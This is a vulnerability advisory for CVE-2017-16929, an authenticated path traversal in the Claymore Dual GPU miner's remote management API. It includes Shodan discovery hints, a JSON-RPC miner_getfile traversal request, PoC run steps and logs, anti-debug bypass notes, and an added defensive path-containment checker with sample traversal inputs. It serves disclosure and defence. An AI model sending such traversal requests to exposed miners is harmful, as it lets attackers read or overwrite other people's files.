VuNote
===================
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929
Version: 0.2
Date: Nov 30th, 2017
Tag: claymore dual ethereum decred crypto currency miner
Overview
--------
Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner
Vendor: nanopool/claymore
References:
* https://github.com/nanopool/Claymore-Dual-Miner
* https://bitcointalk.org/index.php?topic=1433925.0
Version: 10.1 [2]
Latest Version: 10.1 [2]
Other Versions: <= 10.1
Platform(s): windows, linux
Technology: C/C++
Vuln Classes: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Origin: remote
Min. Privs.: authenticated
Source: Closed; runtime protection mechanisms
CVE: CVE-2017-16929
Description
---------
A specialized mining solution with a remote management interface for mining Ethereum, Decred, Siacoin, LBRY Credits and
Pascal Coin.
Quoted from the project website [1][2]:
- Supports new "dual mining" mode: mining both Ethereum and Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum mining speed. Ethereum-only mining mode is supported as well.
- Effective Ethereum mining speed is higher by 3-5% because of a completely different miner code - much less invalid and outdated shares, higher GPU load, optimized OpenCL code, optimized assembler kernels.
- Supports both AMD and nVidia cards, even mixed.
- No DAG files.
- Supports all Stratum versions for Ethereum: can be used directly without any proxies with all pools that support eth-proxy, qtminer or miner-proxy.
- Supports Ethereum and Siacoin solo mining.
- Supports both HTTP and Stratum for Decred.
- Supports both HTTP and Stratum for Siacoin. Note: not all Stratum versions are supported currently for Siacoin.
- Supports Stratum for Lbry and Pascal.
- Supports failover.
- Displays detailed mining information and hashrate for every card.
- Supports remote monitoring and management.
- Supports GPU selection, built-in GPU overclocking features and temperature management.
- Supports Ethereum forks (Expanse, etc).
- Windows and Linux versions.
Summary
-------
> "FOMO driven security blindness."
The remote management interface of the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated relative directory
traversal: a specially crafted remote management request lets a remote attacker read or write arbitrary files, because
the supplied file path is neither validated nor sanitized.
* API calls
  * miner_getfile (read) ... read any file
  * miner_file (write) ... write any file
* Conditions:
  * authenticated
  * write: miner *not* in read-only mode
Successful exploitation allows an authenticated user to read/write arbitrary files with the permissions of the miner process.
See attached PoC.
Details
-------
Service Discovery:
* shodan: 'eth result' lists about 170-240 publicly available instances [3] with significant hash power
* banner:
```html
<html><body bgcolor="#000000" style="font-family: monospace;">
{"result": ["10.1 - ETH", "4286", "149336;7492;0", "30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", "62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", "0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, command miner_file ignored
</font><br><font color="#00ff00">ETH: 11/22/17-15:28:38 - SHARE FOUND - (GPU 3)
....
```
Remote Management API overview:
```
# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}
```
Directory Traversal:
* `miner_file` and `miner_getfile`: neither command appears to sanitize the provided path in any way, allowing relative
  path traversal.
```python
# Vector: traversal
# Description: path traversal
# Result: retrieves any file
# (request vector from poc.py; the enclosing dict name is illustrative)
VECTORS = {
    "traversal": {"id": 0,
                  "jsonrpc": "2.0",
                  "method": "miner_getfile",
                  "params": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]},  # <<-- path traversal
}
```
See the `traversal` vector in the attached PoC.
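The check below is an added example, not code from this advisory or from the Claymore miner (whose source is closed). It shows how the server side could confine `miner_file`/`miner_getfile` to the miner's own directory on both Windows and Linux path syntax, and reuses the same logic as a detector run over constructed JSON-RPC request lines shaped like the API overview above. The allow-list of file names, the `resolve`/`inspect_request`/`flag_traversal` helpers and the sample requests are assumptions made for the example.

```python
import json
import ntpath
import os
import posixpath

# Names the remote-management API legitimately reads/writes (taken from the API
# overview). ASSUMPTION: a strict allow-list is acceptable for this interface.
ALLOWED_FILES = {"config.txt", "epools.txt", "dpools.txt"}

# Methods that take a file name as params[0] (from the advisory).
FILE_METHODS = {"miner_getfile", "miner_file"}


def is_contained(requested, allow_list=None):
    """True only if `requested`, taken relative to the miner directory, cannot
    escape it. Purely lexical, so it behaves identically on Windows and Linux."""
    if not requested or "\x00" in requested:
        return False
    # Reject drive letters ("C:...") and UNC prefixes ("\\\\server\\share") up front.
    if ntpath.splitdrive(requested)[0]:
        return False
    # Treat backslashes as separators so "..\\x" is handled like "../x".
    normalised = requested.replace("\\", "/")
    if normalised.startswith("/"):          # absolute path
        return False
    # Collapse "." and ".." components; a leading ".." survives normpath.
    collapsed = posixpath.normpath(normalised)
    if collapsed in (".", "..") or collapsed.startswith("../"):
        return False
    if allow_list is not None and collapsed not in allow_list:
        return False
    return True


def resolve(base_dir, requested, allow_list=None):
    """Return the path the server may open, or None if the request is rejected."""
    if not is_contained(requested, allow_list):
        return None
    return os.path.join(base_dir, posixpath.normpath(requested.replace("\\", "/")))


def inspect_request(line):
    """Classify one JSON-RPC line received on the -mport port.
    Returns (method, path, verdict); verdict is 'ok', 'traversal',
    'not-a-file-command' or 'malformed'."""
    try:
        req = json.loads(line)
    except ValueError:
        return (None, None, "malformed")
    if not isinstance(req, dict):
        return (None, None, "malformed")
    method = req.get("method")
    if method not in FILE_METHODS:
        return (method, None, "not-a-file-command")
    params = req.get("params") or []
    if not params or not isinstance(params[0], str):
        return (method, None, "malformed")
    path = params[0]
    verdict = "ok" if is_contained(path, ALLOWED_FILES) else "traversal"
    return (method, path, verdict)


def flag_traversal(lines):
    """Return [(method, path)] for every file command whose path escapes the
    miner directory or names a file outside the allow-list."""
    return [(m, p) for (m, p, v) in map(inspect_request, lines) if v == "traversal"]


# Constructed sample traffic: benign calls from the API overview plus three
# traversal attempts (the advisory's vector, a backslash variant, an absolute path).
SAMPLE_REQUESTS = [
    '{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["..\\\\other\\\\config.txt","<encoded>"]}',
    '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["C:\\\\Windows\\\\win.ini"]}',
]

if __name__ == "__main__":
    for method, path in flag_traversal(SAMPLE_REQUESTS):
        print("REJECT %-14s %s" % (method, path))
```

The containment test is lexical on purpose: it rejects `..` escapes, absolute paths, drive letters and UNC prefixes before anything touches the filesystem, and the allow-list reduces the reachable set to the three files the API actually manages. Run as a script it lists the three rejected requests; the same functions can be pointed at captured `-mport` traffic to spot traversal attempts against miners that still run 10.1.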
Proof of Concept
----------------
Prerequisites:
* compatible AMD/NVidia hardware
1. Start the miner in read/write mode with no password set, for testing:
```
#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport 3333
...
```
2. Run `poc.py --vector=traversal <target>` (the PoC expects `EthDcrMiner64.exe` to be placed in a directory called `/Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0`):
```
[poc.py - <module>() ][ INFO] --start--
[poc.py - <module>() ][ INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py - <module>() ][ INFO] # github.com/tintinweb
[poc.py - iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
[poc.py - <module>() ][ INFO] [i] Target: 127.0.0.1:3333
[poc.py - <module>() ][ INFO] [+] connected.
[poc.py - <module>() ][ DEBUG] <-- 1048 '{"id": 0, "error": null, "result": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt", "<encoded file data>"]}'
[poc.py - <module>() ][ INFO] --done--
```
3. EthDcrMiner returns the file's content, as shown in its log:
```
...
DCR: 11/22/17-22:56:06 - New job from pasc-eu2.nanopool.org:15555
Remote management: file ..\Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0\config.txt was uploaded
DCR: 11/22/17-22:56:16 - New job from pasc-eu2.nanopool.org:15555
...
```
Patch
-----
N/A - closed source :/
Notes
-----
* Timeline
  * 11/22/2017 - vendor contact: report sent
  * 11/23/2017 - vendor response:
    * fixed version 10.2 ready and publicly available
    * request for 7+ day embargo
    * vendor statement:
      > The root cause is that remote management was designed to be used in local network only.
      > But some "smart" people want to share ports to everyone and then catch problems. I will close
      > the issues you found, but attacker will be able to do something bad anyway, at least execute ddos
      > to prevent remote management work as expected.
  * 12/04/2017 - public disclosure
* Vendor Changelog
Latest version is v10.2:
- fixed critical issues in remote management feature (attacker could crash miner even in read-only mode).
- now miner supports up to #299 epoch.
- in rare cases ADL API calls can hang, now watchdog checks it as well.
- improved "-minspeed" option, check readme for details.
- added "miner_getstat2" command to remote management, check "API.txt" for details.
- EthMan: added detailed stats mode in main window.
- a few minor improvements in both miner and EthMan.
* Runtime Protection
```
* Linux: packer / just compression
* gdb
* Windows: protector / anti-debug, vmprotect?
* x64dbg: DbgUiRemoteBreakin <- RET
```